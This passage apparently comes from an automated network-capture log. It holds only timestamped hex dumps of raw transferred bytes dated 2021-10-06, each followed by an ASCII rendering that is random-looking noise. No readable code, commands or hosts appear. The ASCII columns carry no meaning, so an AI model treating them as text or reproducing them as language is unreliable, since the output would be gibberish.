0a d0 04 53 41 f5 c7 ca 46 e5 3f 59 d4 42 3c 80 99 ca cf 0d 89 15 2f 77 70 74 8e 6a
                                                          Data Ascii: NB,MMxjV| >(FHE#A@Jnc'=\Gf!mV5>LQ7@xe-AT^\623"s4&YN})rbbIa){9.kZmIP/4=?9#OY>!abiA,=K;%"dCtmSAF?YB</wptj
                                                          2021-10-06 16:03:54 UTC55INData Raw: e6 6c 29 e1 28 8b dd cd 91 18 86 ce 44 84 f1 46 17 7d 38 58 28 c5 dd e0 ef e1 e1 9a e1 9d 78 02 a1 8d 10 c8 fd df cf 7f 8d c3 f1 3b 33 3e 89 4e f8 a4 d3 c9 40 bd 20 00 23 b3 a5 5b c7 72 47 51 60 86 a0 7e 30 87 59 68 c9 6a 14 59 18 6d 3f 29 5b da 36 e4 c1 66 6e ed 18 73 1e d6 0c da b6 fc 72 0a f5 52 a6 3a 2a cc 42 cc 0c 52 43 22 5e 2b f0 98 fe 8b 7e 16 a3 7c b8 04 12 a7 24 5b 45 32 a7 13 3e 53 1e aa ca 2d ad 5c 19 85 57 3e e7 2c db c3 52 17 96 16 b8 89 08 f9 e9 32 4e 04 c1 6d 5a cb d6 2d df dc 43 47 6b 74 6b 43 9e 29 e6 b5 9a f0 db e4 9b ff a9 43 45 87 ab ba 7e a3 7c 51 86 f2 5b 4e 02 87 a0 7d 69 d1 3f f9 23 43 97 4d cd f6 7b ff 89 b1 0a 31 60 5f 7a 23 0d c8 21 8c a7 a5 4a b3 38 ed c7 e9 55 7f b5 15 d3 39 19 14 d0 3b 37 b9 25 c5 e5 2d 02 e8 29 0d b1 68 6c
                                                          Data Ascii: l)(DF}8X(x;3>N@ #[rGQ`~0YhjYm?)[6fnsrR:*BRC"^+~|$[E2>S-\W>,R2NmZ-CGktkC)CE~|Q[N}i?#CM{1`_z#!J8U9;7%-)hl
                                                          2021-10-06 16:03:54 UTC56INData Raw: 26 4c 79 29 96 fc 33 56 91 b8 35 e6 02 ec 21 3c 6d 4c 3d ca 24 bd a8 f8 a8 32 92 42 7b 72 72 55 c4 95 1b 41 05 34 a3 83 48 99 d8 e3 9b a4 35 1e 84 21 86 5e c6 d3 0a c2 37 e5 23 5c 56 5b 33 35 f7 ae 39 5f 3d fb 74 29 2e 13 0f 32 a9 a8 ad 8b de b0 9f 38 60 3c b0 6a 24 49 2b bf 2b 28 e9 3f 9e 05 7e 99 cd 4e 41 3e 33 c1 52 19 3b db 9d 32 d4 67 85 8d 5f e3 a3 a9 6f 02 0f 38 d5 31 d2 c2 0f f0 8f 96 c4 e8 34 73 a1 43 7c 50 8e 13 b3 c2 9c b4 b9 89 5f 49 fb 12 eb 01 1b 44 98 c7 b8 33 1f 96 d0 b7 3b 52 65 60 0f 40 59 8b 74 a5 f7 ee 32 7b ff 4e 2a 99 4c f0 dc 26 80 3f 3e 3a 7d 7f 14 79 56 7f ca 99 ee 44 8b 3c 28 03 e0 fd 8d 3f a1 af db 73 fe 2e 24 87 52 31 cd 87 b2 ba 2b 63 23 0a fb 6d 8e ea 57 51 c6 3a 55 d5 84 3c b4 ff 58 6b a8 3b 5a c8 18 67 a2 fe 71 09 8b 7f a2
                                                          Data Ascii: &Ly)3V5!<mL=$2B{rrUA4H5!^7#\V[359_=t).28`<j$I++(?~NA>3R;2g_o814sC|P_ID3;Re`@Yt2{N*L&?>:}yVD<(?s.$R1+c#mWQ:U<Xk;Zgq
                                                          2021-10-06 16:03:54 UTC57INData Raw: 60 5d 74 99 8f b3 6a 18 71 48 73 31 43 65 53 66 f8 2c 2f 58 e1 d8 fb d2 72 46 15 09 6d e6 ff 7d dd bf e9 6f 1d f5 69 a8 3e 3b d8 75 f1 f6 53 69 01 70 09 f2 9e eb 9f 7f 21 9c 6b aa 02 2b aa 3f 4a bd 1b d6 0e 2f 5e 05 36 9d 05 83 5f 0a 8c 50 19 df 33 e6 54 55 36 aa 2c 9b 8b 02 ec f0 24 4d 1e c2 69 63 3c cd d3 d8 e1 5c 47 51 77 6b 4f d9 22 e4 b5 96 c9 2d f6 93 96 a5 65 45 81 b0 a0 6b bd 00 65 84 e3 4f 40 1d 51 81 55 63 c6 5a c4 bb 50 9d 54 cb ec 06 e7 99 a3 1f cc 91 7b 7e 19 1c c0 3a 9a c2 ab 70 b3 3e f8 3d fa 99 6a 81 2f fb 23 e7 1f ef 3b 6c 02 21 c5 e9 35 2f cf 32 1e a9 b6 7f a9 c2 b4 d4 92 4f 1b 9d 54 9e 30 9c 37 17 1e dc 4d 5d ef a4 6d be fe 68 46 d0 df 37 44 45 73 23 e5 55 30 15 0e 97 e5 c8 79 70 7d 2d 84 59 09 b7 a5 6c c5 ac 6f f9 44 33 b6 5f b5 6f ef
                                                          Data Ascii: `]tjqHs1CeSf,/XrFm}oi>;uSip!k+?J/^6_P3TU6,$Mic<\GQwkO"-eEkeO@QUcZPT{~:p>=j/#;l!5/2OT07M]mhF7DEs#U0yp}-YloD3_o
                                                          2021-10-06 16:03:54 UTC59INData Raw: 3e 0a 2a ce f9 f0 4a 4b d1 67 2c 00 ea 1f 23 a6 4b 3b 8b de bb ad 3a 4f 2d ab 6e 5a 67 3e 69 3e 3f e9 28 89 63 64 a5 32 b7 af 27 0a 58 3d 3f 33 d1 45 31 ed 78 89 89 55 cd e2 81 6d 04 03 16 fc 20 bd d0 d0 f0 83 ad d4 ff a3 7c b1 52 6c 41 99 2d ae 3d 63 4b d2 81 48 9f 92 1a fa 08 18 57 a6 64 5f cc e0 49 de a2 14 65 63 61 05 53 35 f8 ce b4 f5 ee 3d 45 a8 af 2b 93 98 ed 85 3f 81 17 29 14 69 7e 14 73 5c 79 e2 24 ee 44 81 d1 4c 02 e0 11 82 4c 87 bb db 79 ed 32 35 81 47 02 d5 84 b2 3f 3e ee 24 70 fb 6c 8c 91 fc 59 d0 4e 3b fd df 38 16 e8 3f 9b bd 13 98 da 1c 13 8f f8 65 2b af 53 8c ee 04 b2 a9 c0 d1 d5 00 93 de 39 a9 4c 75 5b ac 24 bc 98 ee fe 8c 9b 43 b5 0d 5c a9 9a 61 1d 9b 4c cb 9c 38 d7 33 bf 98 92 b7 50 61 26 23 72 e8 49 6f e1 b5 19 72 aa 40 1f c3 3e 2e e1
                                                          Data Ascii: >*JKg,#K;:O-nZg>i>?(cd2'X=?3E1xUm |RlA-=cKHWd_IecaS5=E+?)i~s\y$DLLy25G?>$plYN;8?e+S9Lu[$C\aL83Pa&#rIor@>.
                                                          2021-10-06 16:03:54 UTC60INData Raw: 2b 50 3a 4a b1 1b 17 0e 2f 52 1a 20 93 05 3a 5e 0a 8c 6e 1f f3 33 e0 76 a6 19 f9 55 91 15 02 ea e9 3e 59 06 d5 45 65 db ce d5 c8 d8 74 6f 76 7d 7d bb b7 1b e1 9d be da 24 e1 8d d1 af 67 45 8d b7 57 7b e5 43 44 92 ef 94 f6 14 79 a1 40 65 e8 1b ec b9 56 8d 7a f4 e5 69 f5 8e 8d 55 61 bc 5c 56 28 0f c8 21 81 e0 d4 4a b3 38 9d cb f8 47 79 b5 0f dd 25 88 31 fe 30 19 a9 29 d4 e7 16 05 f6 32 18 cc 4e 7f af ee a2 f6 ba 0c 1f dc 66 f1 1a 9e 37 11 19 76 45 32 f7 e1 6d b4 20 c2 35 f2 dd 38 42 56 7a 28 ec 7d 66 17 0e 91 8a e6 7b 70 7b 36 8c 48 0e c8 80 6e c5 bf 7e f0 55 2c 9e 5d b5 74 d9 82 c1 bc ec cb 79 0b 5b 57 b0 4c c8 9d d8 92 c1 11 f0 e2 fc b1 de eb 2c 47 e8 e7 8d 41 31 df b0 5f 15 34 e0 20 fc c5 ce 4d 71 4a fa 1f 82 4a 05 2b 45 00 40 a5 e4 2c f4 76 58 4b e9 e4
                                                          Data Ascii: +P:J/R :^n3vU>YEetov}}$gEW{CDy@eVziUa\V(!J8Gy%10)2Nf7vE2m 58BVz(}f{p{6Hn~U,]ty[WL,GA1_4 MqJJ+E@,vXK
                                                          2021-10-06 16:03:54 UTC61INData Raw: 66 26 c5 20 b7 04 1b d5 ad b0 d4 ff e8 73 bf 21 d6 41 99 27 a3 15 5b 4b a8 8a 96 a6 f9 0a ed de 19 46 b7 75 54 de 6e ff fa 4a ed 9a 9a 71 03 44 9d eb c8 b4 f1 f5 2f 6d 4c b0 d5 6c 4c e7 ff 24 be 15 3e 71 72 70 67 c3 56 7f c0 b5 c6 7c 8b f9 20 dd e2 1d a5 36 8b ba db 32 ca 34 24 87 53 2a fd 45 b2 39 29 be 23 70 fb cf 9e 99 ed 44 c6 30 5f e7 df 3c b5 f9 37 8f a9 69 50 db 1c 9e 9f fe 71 da 87 57 8c fd 13 3f ae da d1 d4 12 88 ff 32 bf a1 f9 d0 ac a0 bd 3a ee e0 8b 89 53 b0 0c 5c a3 8b 76 0f af 98 ce b0 36 f8 c1 b8 98 92 ab 50 6f 37 3a 62 81 d2 6e cd b2 a3 70 a4 54 1a ed e9 26 1f 64 89 f3 ac a0 a5 f2 bc c5 87 80 5a 5f 35 b2 8a 64 f3 f1 7a 21 31 80 64 27 87 cf aa 1d 01 71 61 fe bc a5 8e 01 20 1c d6 b9 b8 40 d1 93 40 2b bc a5 79 a0 46 87 19 c5 a6 92 90 7c 27 19
                                                          Data Ascii: f& s!A'[KFuTnJqD/mLlL$>qrpgV| 624$S*E9)#pD0_<7iPqW?2:S\v6Po7:bnpT&dZ_5dz!1d'qa @@+yF|'
                                                          2021-10-06 16:03:54 UTC63INData Raw: 78 4f a7 18 a9 7a ba f3 52 81 fc 42 71 f2 79 a1 51 ff d1 32 f1 b5 4f c8 ce cb e2 76 f2 87 d9 89 03 99 41 58 0e 89 c0 30 89 54 92 4f ac 31 ed 9f 66 56 78 bb 17 da bf f6 12 e3 21 09 24 30 c2 fc 2c 11 6b 23 19 bc 7b 6b 33 f9 b4 e1 86 59 87 cd 67 81 25 8a ab 06 19 78 5b 7d 10 e0 6d be 62 86 41 cf c8 2e d8 54 74 26 fd 43 ad 04 09 88 fc ee f9 70 7d 27 19 48 0e b8 be 7a 59 a8 68 e6 5f 3f 2a 4e b3 6b c3 fb 7b af eb d2 75 22 f3 14 b4 4c 52 e3 f5 8f df 37 77 f3 f5 de 5a fb 2b 52 29 e4 34 78 01 c0 90 75 f9 3e 93 9a 60 d4 c3 5e 78 64 66 0e 8f 8b 25 3a f3 19 6d ba c7 3a 29 7b 5f 54 cd c4 56 ff 44 8e 0b a4 56 c3 b6 30 84 cf 07 4d 7e 2d 70 83 4e 05 28 d6 80 4c 95 dc 80 a5 c7 51 eb f6 4b 5b 50 2e cb aa dd d9 cf d7 e9 23 b6 1e 31 83 11 f4 37 ea 21 2f 0f 7a de c3 57 51 cc
                                                          Data Ascii: xOzRBqyQ2OvAX0TO1fVx!$0,k#{k3Yg%x[}mbA.Tt&Cp}'HzYh_?*Nk{u"LR7wZ+R)4xu>`^xdf%:m:){_TVDV0M~-pN(LQK[P.#17!/zWQ
                                                          2021-10-06 16:03:54 UTC64INData Raw: eb d6 04 9a 04 28 68 71 47 ca 7b 56 7f db a9 ff 54 11 f4 23 3a 2c 19 8f 3f a8 d5 6a 72 fe 3e 37 94 45 39 ef b8 03 3b 29 63 32 63 ea 7f 05 8a e9 58 d7 34 30 4d de 3c be ea 32 fc c8 3a 50 d1 0f 1f 8f fb 59 59 82 57 8a 87 a1 3e ae ca c5 2a 12 8d 31 30 ae 5e d1 8b a8 24 bb 55 4d f7 98 85 7f 83 0d 4a 5d 8a 76 0c 9b 3a cb 9c 38 af 0c b9 98 98 a2 bd 68 21 d5 65 f6 3d 6a c9 ec bf 63 a4 3b b9 ea f6 25 f5 9b a4 ed 5b b6 13 ee a6 e7 ca 82 5a 48 5c 1d 75 65 d5 e9 95 24 2e 11 84 46 d8 fc b0 01 12 77 12 cd b8 bd 76 13 06 0f 73 82 ba 40 d6 8b 43 29 a0 b3 40 fd 58 79 1e 4b b2 9e 8a 4f 68 1b c0 2f 02 f9 ef 18 d6 91 ab 90 d9 af 61 b1 db eb 36 f1 7f 3d 43 28 83 d1 db 47 37 a8 c1 53 87 e7 46 90 d9 12 4a 39 d1 f6 ce de e7 e2 8e 6a 9c 6a 37 5a 9d 31 b7 5e d6 e7 77 a5 da e6 51
                                                          Data Ascii: (hqG{VT#:,?jr>7E9;)c2cX40M<2:PYYW>*10^$UMJ]v:8h!e=jc;%[ZH\ue$.Fwvs@C)@XyKOh/a6=C(G7SFJ9jj7Z1^wQ
                                                          2021-10-06 16:03:54 UTC65INData Raw: 2b d2 35 2d 0d e6 38 0f bd 59 9c a7 66 04 e8 a3 78 0d cf 6b 97 be 2b 26 13 90 d0 5a 87 fc ff 7e b2 d5 88 57 d4 ce 34 4c 54 78 a3 cd 3f 35 15 08 bf c1 ce 79 7a df 36 8e 4e df b4 af 7d c9 ae b9 ea 48 38 ba 4e ab 45 04 9e 08 bf ec c7 7b 0b 62 10 a7 6d d8 e1 d2 a8 73 12 f7 f3 e4 ff d7 ca b6 5e 23 e3 bd 70 11 c6 c3 a5 07 3e 99 89 ed d4 d5 55 71 f3 f8 1f 8e 82 8a 2b 6f 08 6b b1 f0 38 9d c9 58 4b e3 cc 8c ff 44 84 1b 8a 51 dc 92 35 0a cf 12 45 d4 32 f0 83 4f 2d 1f c7 87 59 9a 90 1c b4 ca 59 15 5b e0 5b 50 2f 44 b5 cc d5 eb e1 7a 30 9e 30 af 92 10 f8 12 ea ae 2a 7b 47 f7 d5 cd 53 db 5f 7c 5f 86 ef 21 2e 6c a4 3c 19 d3 5b bd af a3 af 9e 72 63 23 be eb 5c a8 9b 1a 2e 9b 39 8f bc 08 7c 5c a6 7e 24 94 a1 f9 20 75 4a 42 7b 72 c7 9e 89 69 38 50 2c 33 b2 8b ce a7 c8 f4
                                                          Data Ascii: +5-8Yfxk+&Z~W4LTx?5yz6N}H8NE{bms^#p>Uq+ok8XKDQ5E2O-YY[[P/Dz00*{GS_|_!.l<[rc#\.9|\~$ uJB{ri8P,3
                                                          2021-10-06 16:03:54 UTC66INData Raw: 68 aa 04 02 a6 19 5b 99 25 9a 19 a3 67 09 27 94 8f bc 7f 1e a2 f4 31 f1 39 ce 04 43 18 f3 77 53 88 02 e0 cb f9 5d 17 d9 45 6f d9 ce d9 b1 d8 58 6f 70 66 7c 52 60 19 f1 a4 9e cf a9 e0 9b f9 80 74 63 96 87 bf 6b ad e3 7c 86 e3 48 f3 05 5f b5 79 d1 c0 35 e4 a6 70 17 6d da e5 68 e9 b0 0c 15 12 94 72 79 3f 12 d7 bd 8e c8 83 49 a0 1d e3 c0 ec 56 68 28 38 cc 23 e6 b7 ed 13 0b 90 93 c5 e3 34 18 88 be 21 a3 68 7c b9 c0 41 ff 92 45 21 80 9f 61 cf 8b 24 04 0f 70 5e 4b d7 65 6f be fe 86 49 f8 91 3c 44 43 1c 20 e4 55 3b 38 1f 86 ea e6 29 74 7d 21 ea 40 08 a7 ae 55 01 b9 6f f9 55 3f a9 56 62 67 c7 fc f3 a8 df 9c 79 14 6b c2 a7 54 e5 bb e3 80 d2 30 e6 d4 e4 f9 a9 c9 2e 4d 30 e3 a6 7e 8b d8 b0 55 07 2d b1 8b de d3 d5 59 d5 4d fa 1f 89 36 16 0e 7b 20 d8 a5 e4 26 9d 30 58
                                                          Data Ascii: h[%g'19CwS]EoXopf|R`tck|H_y5pmhry?IVh(8#4!h|AE!a$p^KeoI<DC U;8)t}!@UoU?VbgykT0.M0~U-YM6{ &0X
                                                          2021-10-06 16:03:54 UTC67INData Raw: 8a e3 b5 1e e4 d7 31 ae d7 25 e8 94 82 c5 f2 f5 ba b8 43 61 d5 91 3c a3 2a b9 df c9 1e 59 92 ff cd e9 05 1b 5a b7 75 74 2e f1 4d 4b 25 04 bf 72 b6 88 6c 4b f8 cf b6 f1 f2 2e 56 49 f9 32 49 81 e0 c9 02 a2 47 2f 7e 70 71 80 68 52 6e c4 2c 34 52 a4 e1 3b 05 f1 15 9e 3a b0 b4 4f 53 01 34 24 87 85 3b f9 91 bc ad f3 fd 08 60 ea 6b 8e 97 fc 54 d7 3e cb ec db 2d ba 6d ed 11 af 2a 56 ca 12 8d b6 14 70 03 8c 7f 58 e9 13 35 86 e4 d1 d4 19 91 de 3f a8 8d ea de bd 2a ac 28 ce 5e 46 80 4e 55 3b 5c a3 81 74 06 9b 5e cf 9c 34 1e be be b2 92 f7 5f 69 37 2b 64 96 2c 69 e1 b1 bb 73 a0 54 0b fd f4 2f e1 6a a5 fb a5 ad 73 ff a2 d4 a4 85 5a 62 33 af 74 7f df fd 7a 27 3b c7 f1 26 87 cf a3 14 c4 ed 6a e8 be 95 04 00 0c 1f e8 0d b0 9e c5 b0 6e 38 ba af 40 88 5e 79 1e e3 8b bc 9d
                                                          Data Ascii: 1%Ca<*YZut.MK%rlK.VI2IG/~pqhRn,4R;:OS4$;`kT>-m*VpX5?*(^FNU;\t^4_i7+d,isT/jsZb3tz';&jn8@^y
                                                          2021-10-06 16:03:54 UTC68INData Raw: 16 d2 81 67 44 94 a4 a0 6b b0 66 cd 31 cb 69 50 14 73 b0 55 75 d1 3f e7 37 e7 85 7a cc e4 69 f5 89 a7 0b 03 9b 48 48 06 0a c1 30 83 d9 8a 59 b9 51 d5 e2 fa 4d 6e ad 16 c9 4c cf 14 fc 3a 0e b1 4e ee e2 3e 0d fc 35 1d b5 6b f3 18 87 9f ff 92 45 08 db 48 8a 31 9c 3d 06 19 08 5a 5c ef ea 61 b6 f4 49 53 f5 f7 0f 44 45 79 2a ee 7d 1f 17 0e 91 ef e6 41 70 7d 2d 5b 59 0f 8d a4 6c 84 a5 6f f9 44 29 b6 5f b4 74 df ed d0 bf ec cd 5f 03 73 14 a1 4c ce f2 e8 90 c1 16 ec c3 f3 de a7 ea 2c 4d a6 f2 a8 78 75 be b1 55 0c 33 9a f5 09 c4 c4 4b 4a 74 f8 37 ee 95 07 26 7c 0d 7b a3 f5 29 a3 7b 5d c5 5e 8b 20 fe 44 84 9c b2 46 06 84 f0 95 81 00 52 59 01 e1 85 5f 00 a2 d6 82 dd 05 c2 0a db 37 4f c3 dc ed 53 23 d6 56 bb d0 d5 e2 e6 6d 29 68 0f 88 ba 21 eb 1d f6 ae 39 1c 6f dd ed
                                                          Data Ascii: gDkf1iPsUu?7ziHH0YQMnL:N>5kEH1=Z\aISDEy*}Ap}-[YloD)_t_sL,MxuU3KJt7&|{){]^ DFRY_7OS#Vm)h!9o
                                                          2021-10-06 16:03:54 UTC70INData Raw: 2a 95 ba 65 d9 0c 8f 66 c2 7a 61 75 7b 84 57 7f c0 b0 c6 39 8f f9 2c 2b 61 1f 8f 39 89 2d d8 73 f8 47 d8 86 53 20 92 7d b3 39 23 6b 0b 0f ff 6d 99 b1 6f 55 c6 36 77 6a dc 3c b2 8a cb 8e a9 31 3f 26 1d 19 94 f6 59 80 82 57 8a c0 97 3b ae c6 f9 43 10 9b c9 42 43 5a f9 da c3 d9 bc 3a f5 fe b0 0c 6f 7d 0a 74 27 8f 67 0f 9b e3 cb 9c 38 b3 42 b9 98 98 d9 be 68 37 21 6c be aa 6b e1 b7 93 e7 a6 54 0d c3 71 2b e1 63 d6 07 a4 b7 79 90 5e ce 94 8c 52 66 bb ab 74 63 f7 74 6f 25 3e c7 12 25 87 c3 d5 ff 13 77 6b 80 47 bc 70 0a 1a 1d 91 69 bb 40 dd 8f 83 2b a8 b6 6c 9e 7b 78 18 e9 dd 7b 9c 67 3e 17 d1 2d cf e8 f7 00 f4 b7 ae 92 df 07 1f 1b c3 c3 62 e6 78 2a e6 14 bb bc ee 6f 19 a0 c9 44 90 8f 57 9b ca 0d 27 2b c7 dd f5 a0 42 f2 9a fa 9c 60 37 58 a1 39 e0 0e d7 e7 7d 9f
                                                          Data Ascii: *efzau{W9,+a9-sGS }9#kmoU6wj<1?&YW;CBCZ:o}t'g8Bh7!lkTq+cy^Rftcto%>%wkGpi@+l{x{g>-bx*oDW'+B`7X9}
                                                          2021-10-06 16:03:54 UTC71INData Raw: 30 1f a9 29 d8 1d 3f 2b fe 23 19 b9 77 5e 33 f6 a0 f6 92 5e 13 c3 6a 60 31 b0 3e 06 19 7a 50 c1 f0 eb 7e b6 fe 86 4e cc 21 39 68 4d 62 3e fc 49 ad 08 1d 9f e5 df 71 6f 71 d9 84 75 1b a5 2a db d2 63 78 2f c9 02 b6 5f b5 67 da f2 ea ad e4 cd 79 0a 6c 19 4a 4d e2 fe ec 1d ea 17 f7 f2 e6 da d9 e4 3f 45 36 e3 a0 76 12 21 b1 79 0d 36 84 f5 d6 c4 c4 4b 46 67 e9 17 88 85 0f 33 79 f6 6b 89 e9 24 bc 7e 37 4f eb e4 dc f5 5b 99 84 bd 51 cd 9b 39 11 20 01 7e 52 1c f7 9f 51 5d 28 d8 8d 40 ba ca 0d bc df 59 3d d7 e7 48 56 2c 41 b9 54 71 f7 f2 7f 4c b3 1c ad 98 30 f4 05 ef b5 3e 19 6d ef 2b ca 6c c2 5f 6a 5c b1 d6 b9 35 79 b5 b1 0f db 40 42 bd ad b7 ad 63 6a 32 fd 66 40 bb 99 b8 2e b1 30 67 31 1b 76 4d a0 c7 2a f8 25 f7 3b 4e 53 42 6a 70 7a 9a 55 7b 37 4a 07 3f c9 bb 42
                                                          Data Ascii: 0)?+#w^3^j`1>zP~N!9hMb>Iqoqu*cx/_gylJM?E6v!y6KFg3yk$~7O[Q9 ~RQ](@Y=HV,ATqL0>m+l_j\5y@Bcj2f@.0g1vM*%;NSBjpzU{7J?B
                                                          2021-10-06 16:03:54 UTC72INData Raw: 9e ad 2a 55 cc 73 90 9f fe 77 6c 1e 57 8c e2 00 38 a6 e8 cf d7 13 9d de 37 97 7c f9 d0 a6 0c 92 3a ff fc a1 73 6b 7d 0c 4d a4 a3 60 09 b3 4d dc 94 2f c8 87 54 98 92 b6 52 61 23 03 fc 92 2c 69 f7 3c bc 63 a2 55 1f ff e2 07 42 65 a5 f1 b1 9f a9 fc a3 c9 82 0b 5d 4e 33 ae 60 71 cb d5 c8 25 38 e5 ad ba 87 c5 ac 12 16 5f 6f ee ba bb 63 09 1d 1d ea bf 22 44 d7 9e 4f b5 bd a5 68 a7 48 6d 0c c1 00 84 9d 6d 20 37 1a 2a a0 ee e3 8d f9 cc af 91 cb 19 64 83 61 c3 68 ff 57 a7 e1 39 93 d1 d9 7e 11 be e9 cd 90 e0 51 8f 47 00 5c 2a c4 c9 eb db da 50 9a f0 85 73 0e 89 8f 3c de fa 5a e0 7d 89 c2 e3 40 0d 14 2a 48 e7 8b e8 47 40 ac 38 37 b3 49 a4 71 e8 6b 55 5c 79 9f b9 7d 3b be c4 72 37 61 15 6c 77 f4 17 a6 50 c9 3a d5 e4 07 4c fe 0a 6b f3 db 31 d1 97 78 78 15 fa 2e 9e 38
                                                          Data Ascii: *UswlW87|:sk}M`M/TRa#,i<cUBe]N3`q%8_oc"DOhHmm 7*dahW9~QG\*Ps<Z}@*HG@87IqkU\y};r7alwP:Lk1xx.8
                                                          2021-10-06 16:03:54 UTC73INData Raw: 3b b5 62 da a0 70 9d d8 38 b8 40 ae 54 79 ed e7 be 70 dc 66 1d 68 0b ff d0 df fc ed 8c e1 c4 f7 f3 f5 42 d7 e4 33 50 29 a8 34 78 08 c0 ae 4e 9a 2f 9d 85 e3 da 97 dd 48 7c f7 00 98 19 2c 2c 6f 09 79 ab f5 22 a3 4a c0 4b e9 e4 4a ee 4a 99 88 ba cd cd 9d 3e 07 b6 9c 43 56 14 d0 4d 4e 05 b4 5b 96 5d a8 d5 6b 28 d1 40 d8 c9 88 c7 41 20 4b a4 96 5a f7 f9 74 3c f1 82 bc 9c 08 cb e4 fc bd 3e 94 74 fb ca c2 60 22 4e 6d 4b 32 95 2b 31 60 a2 bf 82 c2 55 a3 b7 a1 3c bc 64 72 b1 87 f4 43 a4 b1 4c 3f b9 2e 05 21 39 63 51 b8 b7 a9 a7 b7 f7 3c 42 17 de 6a 76 7a 80 8b 91 1b 41 0f bb b7 9c 50 8d cf 87 c0 3f 23 09 9c 34 48 5d 35 61 52 0b 37 ef 3a 42 8a 38 f4 0d f7 a4 20 84 89 d9 76 29 39 04 36 77 a8 c7 62 e4 59 bb 85 0f 58 d3 a0 73 4f 0e a1 be 2d 3f ee d0 9a 7c a4 9a ad 64
                                                          Data Ascii: ;bp8@TypfhB3P)4xN/H|,,oy"JKJJ>CVMN[]k(@A KZt<>t`"NmK2+1`U<drCL?.!9cQ<BjvzAP?#4H]5aR7:B8 v)96wbYXsO-?|d
                                                          2021-10-06 16:03:54 UTC75INData Raw: 8a 04 d4 e1 b1 b1 69 a4 7c aa ef f6 29 c9 db a5 fb af c4 65 fd a3 c5 99 8f 35 59 31 af 7e 48 d3 d5 c9 21 38 e9 ad 3e 85 c5 ac 04 38 7e 49 4c be bd 76 6f 15 17 fe 9d a9 4c c1 8b 52 00 26 a4 68 a6 4d 75 09 e2 39 97 99 76 30 70 da 2b a0 e2 e6 0e e8 df a2 a8 ac 0c 70 ab d3 cd 79 f8 e5 28 e7 28 9f ad 5e 6e 19 a0 e9 f1 90 e0 51 b1 74 07 5c 20 d6 d8 ee ca da c2 9a f0 85 5e 61 5e 8c 3c ab 3b d6 e7 77 9a c4 e6 53 0d 14 f5 4a e7 87 d7 56 47 ac 32 1e 39 42 b5 78 d6 75 51 fe 6e 83 a0 7c 21 86 5f 67 20 e6 17 53 66 ff 2c 38 40 d8 26 ef 4e 65 7f eb 22 ca e0 d7 2a fb ae fe 6a 85 d0 5e a5 2a 2d 44 75 fd f2 53 65 f9 38 09 f2 99 d0 8c 76 09 88 47 9e 05 03 bf 4f 5f bb 33 8a 1d 2a 49 0e 33 bd 88 a9 5d 0c 9d cb 36 f1 33 e7 4d 53 09 e9 49 91 2f 06 ea e5 8f 4d 07 c7 79 5f f1 6d
                                                          Data Ascii: i|)e5Y1~H!8>8~ILvoLR&hMu9v0p+py((^nQt\ ^a^<;wSJVG29BxuQn|!_g Sf,8@&Ne"*j^*-DuSe8vGO_3*I3]63MSI/My_m
                                                          2021-10-06 16:03:54 UTC76INData Raw: 07 2d 7f 08 6a a5 e4 2c b5 7f 4d 4b e5 fe d6 ff 45 90 95 9d 4d de 93 2c 32 cd 30 51 58 a3 f2 83 4e a6 b4 c7 96 45 bf f2 bc b6 c0 4e c3 df d4 40 ae 2f 7b b3 e2 5e e4 f7 69 3c aa 13 ad 9b 09 e0 e3 fd 91 30 d8 7f f5 d5 c9 68 df 4e 6d 41 a2 9b 29 23 6a b4 aa e0 d2 77 a8 bb a9 8b b9 64 74 3b be d4 5c a8 9b ae 7f bd 2c 99 30 2b 71 5c ae c5 cb b7 95 e6 31 2e 53 40 7b 72 0a 86 a9 7a 11 4a 15 2a a6 9b 5c 81 36 f5 61 27 f3 53 8f 30 97 61 04 49 65 01 58 f8 2b 44 86 30 b3 2b f5 a4 20 55 51 d3 7b 29 21 1f 02 dd ad eb 71 8f f6 86 80 09 48 3b 89 4c 4b 61 23 a9 6d 2d fa 2e 98 75 47 96 cd 41 4f 25 dc c5 11 2a 3d f3 ac 26 c5 49 9f a1 71 e5 cc 89 7b 42 d3 3e c4 20 a2 d1 03 f0 8c 98 c0 01 e3 4c bf 82 77 41 99 2f 86 29 63 4b a2 8c 57 8a e5 1b f3 17 1a a9 a7 48 57 c8 c8 71 c0
                                                          Data Ascii: -j,MKEM,20QXNEN@/{^i<0hNmA)#jwdt;\,0+q\1.S@{rzJ*\6a'S0aIeX+D0+ UQ{)!qH;LKa#m-.uGAO%*=&Iq{B> LwA/)cKWHWq
                                                          2021-10-06 16:03:54 UTC77INData Raw: 90 87 6a a5 21 10 18 e9 a7 ae 9d 67 34 0c f0 2b a0 c0 f5 00 fe ca af 90 ce 1b 7b 80 d9 c3 6f e2 81 3a cd 3b 81 c9 d2 68 0f 54 c0 79 96 f7 5c 99 cd 1f a2 2b e9 df d4 cd d9 10 98 8b e5 67 26 5b a6 1e da ef aa 8d 7d 89 c7 dd 54 19 3c 9a 78 e5 81 e8 db 40 ac 34 1f 2a 5c b2 7c eb 7f 54 5b 68 72 b2 40 32 8e 40 73 30 7d c6 52 4a fc 28 22 51 ce 28 06 d3 58 6c d7 08 46 03 d5 5b b6 bf ef 78 3f de 43 b7 47 50 de 5d e8 d8 53 6f 29 3e 39 f0 98 d0 98 76 09 27 6f aa 15 15 be 10 51 bb 34 9c f0 2e 74 0b 3f 9e 2d aa 4b f4 8b 6a 33 e6 38 e6 59 5b e6 f8 73 bb a2 00 c1 00 2f 27 7b d3 6d 4f f3 ec d1 dd 8d 36 6f 76 73 41 45 b6 0a f5 85 92 d8 0c e7 9b f9 10 67 45 96 b7 a2 51 a1 6f 44 91 1d 48 7d 16 61 aa 51 64 d6 cb ef 95 52 8c 59 da e2 71 01 99 8f 17 39 9c 75 b5 2c 67 ad 30 89
                                                          Data Ascii: j!g4+{o:;hTy\+g&[}T<x@4*\|T[hr@2@s0}RJ("Q(XlF[x?CGP]So)>9v'oQ4.t?-Kj38Y[s/'{mO6ovsAEgEQoDH}aQdRYq9u,g0
